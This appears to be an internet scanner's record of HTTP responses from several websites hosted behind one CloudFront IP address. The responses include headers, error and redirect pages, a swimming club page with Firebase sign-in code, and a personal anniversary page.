e[r].call(t.exports,t,t.exports,l),t.l=!0,t.exports}l.m=e,l.c=n,l.d=function(e,r,t){l.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},l.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},l.t=function(e,r){if(1&r&&(e=l(e)),8&r)return e;if(4&r&&"object"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(l.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&r&&"string"!=typeof e)for(var n in e)l.d(t,n,function(r){return e[r]}.bind(null,n));return t},l.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return l.d(r,"a",r),r},l.o=function(e,r){return Object.prototype.hasOwnProperty.call(e,r)},l.p="/";var a=this["webpackJsonpreact-three-boilerplate"]=this["webpackJsonpreact-three-boilerplate"]||[],i=a.push.bind(a);a.push=r,a=a.slice();for(var p=0;p<a.length;p++)r(a[p]);var f=i;t()}([])</script><script src="/static/js/2.d9ee60b8.chunk.js"></script><script src="/static/js/main.05247e34.chunk.js"></script></body></html>
Open service 13.32.99.35:443 · riverswimmers.club
2026-01-09 05:08
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 15069
Connection: close
Date: Fri, 09 Jan 2026 05:08:18 GMT
Last-Modified: Sun, 04 Feb 2018 02:39:05 GMT
ETag: "ce4f599ce4e1bbe8977e7e17965f7c9a"
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 7251dede1ac94066b27bcd33919b30c6.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: uo29bUYSKLmurrZgmoiX6A46-l8vBNIjit_BRuT4I8iR3I1Ruoie2w==
Age: 2
Page title: River Swimmers Club
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>River Swimmers Club</title>
<meta property="og:title" content="River Swimmers Club" />
<meta property="og:type" content="website" />
<meta property="og:url" content="http://riverswimmers.club/" />
<meta property="og:image" content="http://riverswimmers.club/_img/rsc.jpg" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M"
crossorigin="anonymous">
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4"
crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js" integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1"
crossorigin="anonymous"></script>
<link href="https://vjs.zencdn.net/6.2.7/video-js.css" rel="stylesheet">
<!-- If you'd like to support IE8 -->
<script src="https://vjs.zencdn.net/ie8/1.1.2/videojs-ie8.min.js"></script>
<link rel="stylesheet" href="/_css/styles.css">
<script src="plyr/plyr.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="plyr/plyr.css">
<script>
(function (i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r;
i[r] = i[r] || function () {
(i[r].q = i[r].q || []).push(arguments)
}, i[r].l = 1 * new Date();
a = s.createElement(o),
m = s.getElementsByTagName(o)[0];
a.async = 1;
a.src = g;
m.parentNode.insertBefore(a, m)
})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-44024954-4', 'auto');
ga('send', 'pageview');
</script>
<script src="https://www.gstatic.com/firebasejs/4.4.0/firebase.js"></script>
<script>
// Initialize Firebase
var config = {
apiKey: "AIzaSyCYxdDdn-0DkSLV4fgeds1ELzznRFyDHfI",
authDomain: "riverswimmers-club.firebaseapp.com",
databaseURL: "https://riverswimmers-club.firebaseio.com",
projectId: "riverswimmers-club",
storageBucket: "riverswimmers-club.appspot.com",
messagingSenderId: "55477810250"
};
firebase.initializeApp(config);
</script>
<script type="text/javascript">
/**
* Handles the sign in button press.
*/
function toggleSignIn() {
if (firebase.auth().currentUser) {
// [START signout]
firebase.auth().signOut();
// [END signout]
} else {
var email = document.getElementById('email').value;
var password = document.getElementById('password').value;
if (email.length < 4) {
alert('Please enter an email address.');
return;
}
if (password.length < 4) {
alert('Please enter a password.');
return;
}
// Sign in with email and pass.
// [START authwithemail]
firebase.auth().signInWithEmailAndPassword(email, password).catch(function (error) {
// Handle Errors here.
var errorCode = error.code;
var errorMessage = error.message;
// [START_EXCLUDE]
if (errorCode === 'auth/wrong-password') {
alert('Wrong
Open service 13.32.99.35:443 · kingwild.vip
2026-01-09 00:01
HTTP/1.1 403 Forbidden Server: CloudFront Date: Fri, 09 Jan 2026 00:01:32 GMT Content-Type: text/html Content-Length: 986 Connection: close X-Cache: Error from cloudfront Via: 1.1 2a44338adc8233e5b25aca28287a69c8.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: LK2BgM0sORUw5fIGjoPEC_95-e4xdbaoHnKdnKwyVUkdkpjdIrQ-fQ== Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>403 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> The Amazon CloudFront distribution is configured to block access from your country. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: LK2BgM0sORUw5fIGjoPEC_95-e4xdbaoHnKdnKwyVUkdkpjdIrQ-fQ== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-08 21:48
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Thu, 08 Jan 2026 21:48:23 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 c43915e0cad14ee7685e5f74a99ce93c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: ygyfB-UenFQg9HF9HcUdA97BsjtvW4KW1HbgzV7pOykSKnFrY-jiBw==
Age: 3
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:80 · publiciscreators.com
2026-01-08 07:17
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Thu, 08 Jan 2026 07:18:01 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://publiciscreators.com/ X-Cache: Redirect from cloudfront Via: 1.1 5492e1c9a06f2320204e7fcc383cff5c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 Alt-Svc: h3=":443"; ma=86400 X-Amz-Cf-Id: RBUiP2ztc8ZDi4Rk-rtdDKTqOjgZv_gzn8nTuHG5pIHm9rsl1YXWkg== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · publiciscreators.com
2026-01-08 07:17
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 105190
Connection: close
Date: Thu, 08 Jan 2026 07:18:02 GMT
Last-Modified: Wed, 07 Jan 2026 17:18:35 GMT
ETag: "908d68b8009d7bdf7e988a196fe6dfe4"
Server: AmazonS3
X-Cache: Miss from cloudfront
Via: 1.1 372875ad1ec20daf24f3f29f14a73cd0.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: cNo4aNpa1ka9i_4yO1pV9y-kMDlOZzhQ4h-5AEES5fNUO36Z1ZA_Zg==
<!doctype html>
<html lang="en" data-beasties-container>
<head>
<meta charset="utf-8">
<title id="site-title"></title>
<base href="/">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="shortcut icon" href="./assets/media/logos/favicon.svg">
<style>@font-face{font-family:'Poppins';font-style:normal;font-weight:300;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLDz8Z11lFc-K.woff2) format('woff2');unicode-range:U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;}@font-face{font-family:'Poppins';font-style:normal;font-weight:300;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLDz8Z1JlFc-K.woff2) format('woff2');unicode-range:U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}@font-face{font-family:'Poppins';font-style:normal;font-weight:300;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2) format('woff2');unicode-range:U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face{font-family:'Poppins';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiEyp8kv8JHgFVrJJbecmNE.woff2) format('woff2');unicode-range:U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;}@font-face{font-family:'Poppins';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiEyp8kv8JHgFVrJJnecmNE.woff2) format('woff2');unicode-range:U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}@font-face{font-family:'Poppins';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiEyp8kv8JHgFVrJJfecg.woff2) format('woff2');unicode-range:U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face{font-family:'Poppins';font-style:normal;font-weight:500;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLGT9Z11lFc-K.woff2) format('woff2');unicode-range:U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;}@font-face{font-family:'Poppins';font-style:normal;font-weight:500;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLGT9Z1JlFc-K.woff2) format('woff2');unicode-range:U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}@font-face{font-family:'Poppins';font-style:normal;font-weight:500;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2) format('woff2');unicode-range:U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face{font-family:'Poppins';font-style:normal;font-weight:600;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLEj6Z11lFc-K.woff2) format('woff2');unicode-range:U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;}@font-face{font-family:'Poppins';font-style:normal;font-weight:600;src:url(https://fonts.gstatic.com/s/poppins/v24/pxiByp8kv8JHgFVrLEj6Z1JlFc-K.woff2) format('woff2');unicode-range:U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}@font-face{font-family:'Poppins';font-style:normal;font-weight:600;src:
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-07 21:33
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Sat, 20 Dec 2025 23:13:52 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 7395d1816622756cd6753f5e1281200c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: WyCHiE3krcp14myiMn5nkUZXZq6OoJhxRTnZTJnFcT4nNktaTkQBDQ==
Age: 1549203
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-06 21:27
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Tue, 30 Dec 2025 12:40:30 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 0a71d283a25c1e3f082b4dbc9d844dfe.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: DZDayFuDwb-_WxAtgYiVyOTtNRYRxUUxLJZ6tSyqWoVCotxPGBI-AA==
Age: 636446
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · cloudfront.inqu.cn
2026-01-04 13:30
HTTP/1.1 403 Forbidden Server: CloudFront Date: Sun, 04 Jan 2026 13:30:13 GMT Content-Type: text/html Content-Length: 919 Connection: close X-Cache: Error from cloudfront Via: 1.1 6fc439c8bc0a64a7ab978ce699795274.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: Tgs9vX8RzoWf8N5TH0bqm-rd_OW8w7_6SXQP_5nZnqTG3XKltZOWyQ== Page title: ERROR: The request could not be satisfied <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <TITLE>ERROR: The request could not be satisfied</TITLE> </HEAD><BODY> <H1>403 ERROR</H1> <H2>The request could not be satisfied.</H2> <HR noshade size="1px"> Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner. <BR clear="all"> If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation. <BR clear="all"> <HR noshade size="1px"> <PRE> Generated by cloudfront (CloudFront) Request ID: Tgs9vX8RzoWf8N5TH0bqm-rd_OW8w7_6SXQP_5nZnqTG3XKltZOWyQ== </PRE> <ADDRESS> </ADDRESS> </BODY></HTML>
Open service 13.32.99.35:80 · cloudfront.inqu.cn
2026-01-04 13:30
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Sun, 04 Jan 2026 13:30:12 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://cloudfront.inqu.cn/ X-Cache: Redirect from cloudfront Via: 1.1 c43915e0cad14ee7685e5f74a99ce93c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: 70dHxJIgpPDjEcnZTzzx3UcBWNu1rLann3wDxA-Ez8xiBrv8_WOqlw== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-03 21:26
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Sat, 20 Dec 2025 23:13:52 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
